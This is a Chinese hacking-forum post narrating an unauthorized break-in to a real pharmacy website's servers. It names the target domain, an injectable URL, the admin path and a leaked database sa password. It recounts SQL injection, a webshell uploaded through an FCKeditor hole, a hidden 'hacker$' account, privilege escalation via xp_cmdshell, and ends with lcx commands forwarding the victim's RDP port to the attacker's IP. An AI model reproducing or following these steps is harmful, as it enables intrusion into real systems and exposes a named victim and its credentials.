一次超级蛋疼的渗透
一次超级蛋疼的渗透
作者:kylin
首发:www.dis9.com
前几天俺认识了一个刷钻的我是我是我是傻逼,后来在我的威逼利诱下,他放弃了刷钻行业,并且他交出了他所在的平台的帐号密码。登陆后发现里面有钱钱~不过只有18.25元,于是我果断的截图并涂掉了中间的小数点。当我把截图发在九区基友群里,一群我是我是我是傻逼就激动了。于是,俺和羽翼决定日掉这个猥琐的平台。
俺们就直接c段了..... 
两个人分工,我从前面开搞。反正是c段,找到最简单就行。但是我们无比蛋疼蛋疼无比,几乎每个ip上都是同一类型的站一堆,而且是各种系统各种环境。最开始的时候羽翼发现了一个ecshop 2.7.2,按理说是有洞洞可用的,不过俺是失败了,没办法,俺是菜鸟啊~
经过一段时间查找,俺们盯上了一个IP,上面的站点都是一套叫“医药无忧”的程序,asp+mssql。
发现注入:http://www.qzyy.net.cn/news_detail_all.asp?id=19180作为懒人俺们就直接上工具了,但是某些工具还是不给力,最后出动了safe3的注入检测工具才弄到MD5。
后台 http://www.qzyy.net.cn/Admin/Admin_index.asp 
后台太tmd郁闷,上传那里自动重命名了,也没别的功能,果断陷入僵局。然后我发现了该网站8080端口也有一个网站,菜刀给力啊~发现登陆页面,用刚才80端口上的网站密码登陆,成功~ 
当然,也有fck编辑器的目录现身,但是还得找exp去看看,我很懒的,还是去后台登陆了。但是经过折腾,只有公告发布的地方有个上传,但是得选择会员发送,而选择会员那里有点问题,怎么也选不上,于是我又回到了fck.... 
传马,无压力,拿到webshell。然后我就出去吃饭了,等我回来的时候已经看到用户组里有了hacker$,问之,原来用了某神器成功添加帐户。 
但是,3389连上不。羽翼说是防火墙设置了允许3389登陆的IP段,我果断反对啊。因为c段里所有服务器的系统和环境都不一样,应该都是独立服务器,而这台服务器根据一路入侵过来的经验来看,管理员应该是没有什么安全常识的,那么他怎么会想到限制登陆IP段呢。好吧,羽翼被我说服了~~~~服务器上有麦咖啡和360,很多东西都被杀,于是羽翼找人做免杀,但是要等到第二天。然后砍少同学迅速的发现了SQL密码,但是改掉了。然后我们转向了LOL阵地,撸了一把后继续来日。
我提出,www.qzyy.net.cn服务器上的站都是[url]www.yy5u.com[/url]开发的,而两个站不在一个ip上,可能另外一台可以3389,但是经过尝试,c段中几乎没有可以3389连接的。说明c段是一个idc管理的,所有3389都被禁用或者改端口什么的。然而我又想不明白的是,这样的话idc就只能卖虚拟空间,但是www.qzyy.net.cn却在8080端口有另一个网站来衔接,这让人很不解啊。不过既然每个IP都无法3389访问,我就不用去再拿一个c段IP来提权了,只能等羽翼的免杀,然后我又不甘心的一个人试着提了好久。
Aspx马儿传上去就被杀,只有砍少那货传了俩编码有问题的马儿没被杀,难道杀软对编码也有要求?恍惚间看见了VNC,一般VNC密码都在注册表,但是我怎么读都没找到password这个键。 
再一次蛋碎啊。某大牛让我lcx连接或者nc反弹本地,不过时间已经过了十二点了,俺得先休息了。
早上六点多爬起来继续研究,因为该服务器上挂了有十几个网站,其中有一个没有运行的discuz NT,在它的配置文件中找到了sa密码yy5u1357924680。 
然而注册表里键值显示3389是开启的且端口未被改动,某大牛说是策略组或者防火墙的功劳。策略组我觉得不大可能,因为这个管理员应该不会那么聪明,而进程里确实看到了firewall。在E盘software文件夹里看到了服务器上安装的一些软件的安装包,确定了vnc版本是4.2.9,并且有一个系统镜像备份,如果把这个镜像下载下来弄虚拟机安装上,在用前段日子出的直接读系统密码的神器,应该就可以获得管理员密码,但是现在对我来说管理员密码并不重要。 
后来,放了两天,继续渗透。通过sa用户,用分离器连接,修复xp_cmdshell,成功提权。
然后用lcx转发端口:
本地:
lcx -listen 51 2008
webshell:
设置cmd路径
setp D:\Web\NetSrvWeb\upfiles\image\cmd.exe
转发3389端口
D:\Web\NetSrvWeb\upfiles\image\lcx -slave 本地外网IP 51 127.0.0.1 3389在webshell上执行会出现假死,属于正常情况
成功连接3389。由于自己在网吧,没有时间内网渗透,下次继续。